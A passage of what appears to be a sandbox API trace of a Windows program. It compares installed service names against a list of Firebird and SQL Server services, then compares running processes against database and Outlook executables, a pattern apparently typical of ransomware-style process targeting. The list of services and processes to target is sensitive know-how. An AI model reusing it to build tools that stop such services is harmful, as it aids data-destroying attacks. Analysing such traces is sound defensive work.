lpString2="DcomLaunch") returned 1 [0272.111] lstrlenW (lpString="Dhcp") returned 4 [0272.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0272.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0272.112] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0272.112] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0272.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0272.112] lstrlenW (lpString="Dnscache") returned 8 [0272.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0272.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0272.112] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0272.112] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0272.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0272.112] lstrlenW (lpString="eventlog") returned 8 [0272.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0272.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0272.112] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0272.112] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0272.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0272.112] lstrlenW (lpString="EventSystem") returned 11 [0272.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0272.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0272.112] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0272.112] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0272.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0272.112] lstrlenW (lpString="gpsvc") returned 5 [0272.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0272.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0272.112] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0272.112] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0272.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0272.112] lstrlenW (lpString="lmhosts") returned 7 [0272.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0272.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0272.113] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0272.113] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0272.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0272.113] lstrlenW (lpString="MMCSS") returned 5 [0272.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0272.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0272.113] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0272.113] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0272.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0272.113] lstrlenW (lpString="nsi") returned 3 [0272.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0272.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0272.113] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0272.113] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0272.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0272.113] lstrlenW (lpString="PlugPlay") returned 8 [0272.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0272.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0272.113] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0272.113] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0272.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0272.113] lstrlenW (lpString="Power") returned 5 [0272.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0272.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0272.113] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0272.113] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0272.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0272.113] lstrlenW (lpString="ProfSvc") returned 7 [0272.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0272.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0272.113] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0272.113] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0272.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0272.114] lstrlenW (lpString="RpcEptMapper") returned 12 [0272.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.114] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0272.114] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0272.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0272.114] lstrlenW (lpString="RpcSs") returned 5 [0272.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0272.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0272.114] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0272.114] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0272.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0272.114] lstrlenW (lpString="SamSs") returned 5 [0272.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0272.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0272.114] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0272.114] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0272.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0272.114] lstrlenW (lpString="Schedule") returned 8 [0272.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0272.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0272.114] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0272.114] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0272.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0272.114] lstrlenW (lpString="SENS") returned 4 [0272.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0272.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0272.114] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0272.114] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0272.114] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0272.114] lstrlenW (lpString="ShellHWDetection") returned 16 [0272.114] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.114] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.115] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0272.115] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0272.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0272.115] lstrlenW (lpString="Spooler") returned 7 [0272.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0272.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0272.115] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0272.115] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0272.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0272.115] lstrlenW (lpString="Themes") returned 6 [0272.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0272.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0272.115] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0272.115] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0272.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0272.115] lstrlenW (lpString="UxSms") returned 5 [0272.115] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0272.115] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0272.115] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0272.115] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0272.115] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0272.115] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x427d1e0 | out: hHeap=0x5e0000) returned 1 [0272.115] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x31c [0272.116] Process32FirstW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0272.116] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0272.116] lstrlenW (lpString="System") returned 6 [0272.116] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0272.117] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0272.117] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0272.117] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0272.117] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0272.117] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0272.117] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0272.117] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0272.117] lstrlenW (lpString="smss.exe") returned 8 [0272.117] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0272.117] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0272.117] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0272.117] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0272.117] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0272.117] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0272.117] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0272.117] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.117] lstrlenW (lpString="csrss.exe") returned 9 [0272.117] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.117] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.118] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.118] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.118] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.118] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.118] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.118] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0272.118] lstrlenW (lpString="wininit.exe") returned 11 [0272.118] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0272.118] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0272.118] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0272.118] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0272.118] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0272.118] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0272.118] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0272.118] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0272.118] lstrlenW (lpString="csrss.exe") returned 9 [0272.118] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0272.118] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0272.118] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0272.118] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0272.119] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0272.119] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0272.119] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0272.119] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0272.119] lstrlenW (lpString="winlogon.exe") returned 12 [0272.119] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0272.119] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0272.119] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0272.119] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0272.119] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0272.119] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0272.119] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0272.119] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0272.119] lstrlenW (lpString="services.exe") returned 12 [0272.119] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0272.119] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0272.119] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0272.119] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0272.119] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0272.120] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0272.120] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0272.120] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0272.120] lstrlenW (lpString="lsass.exe") returned 9 [0272.120] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0272.120] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0272.120] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0272.120] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0272.120] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0272.120] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0272.120] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0272.120] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0272.120] lstrlenW (lpString="lsm.exe") returned 7 [0272.120] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0272.120] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0272.120] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0272.120] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0272.120] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0272.120] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0272.121] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0272.121] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.121] lstrlenW (lpString="svchost.exe") returned 11 [0272.121] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.121] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.121] lstrlenW (lpString="svchost.exe") returned 11 [0272.121] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.121] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.121] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.122] lstrlenW (lpString="svchost.exe") returned 11 [0272.122] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.122] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.122] lstrlenW (lpString="svchost.exe") returned 11 [0272.122] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.122] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.122] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.123] lstrlenW (lpString="svchost.exe") returned 11 [0272.123] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.123] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.123] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.123] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.123] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.123] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.123] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.123] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0272.123] lstrlenW (lpString="audiodg.exe") returned 11 [0272.123] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0272.123] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0272.123] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0272.123] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0272.123] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0272.123] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0272.123] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0272.123] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.124] lstrlenW (lpString="svchost.exe") returned 11 [0272.124] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.124] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.124] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.124] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.124] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.124] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.124] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.124] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0272.124] lstrlenW (lpString="userinit.exe") returned 12 [0272.124] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0272.124] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0272.124] lstrcmpiW (lpString1="outlook.exe", lpString2="userinit.exe") returned -1 [0272.124] lstrcmpiW (lpString1="postgres.exe", lpString2="userinit.exe") returned -1 [0272.124] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="userinit.exe") returned -1 [0272.124] lstrcmpiW (lpString1="mysqld.exe", lpString2="userinit.exe") returned -1 [0272.124] lstrcmpiW (lpString1="sqlservr.exe", lpString2="userinit.exe") returned -1 [0272.124] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0272.125] lstrlenW (lpString="explorer.exe") returned 12 [0272.125] lstrcmpiW (lpString1="1c8.exe", lpString2="explorer.exe") returned -1 [0272.125] lstrcmpiW (lpString1="1cv77.exe", lpString2="explorer.exe") returned -1 [0272.125] lstrcmpiW (lpString1="outlook.exe", lpString2="explorer.exe") returned 1 [0272.125] lstrcmpiW (lpString1="postgres.exe", lpString2="explorer.exe") returned 1 [0272.125] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="explorer.exe") returned 1 [0272.125] Process32NextW (in: hSnapshot=0x31c, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, 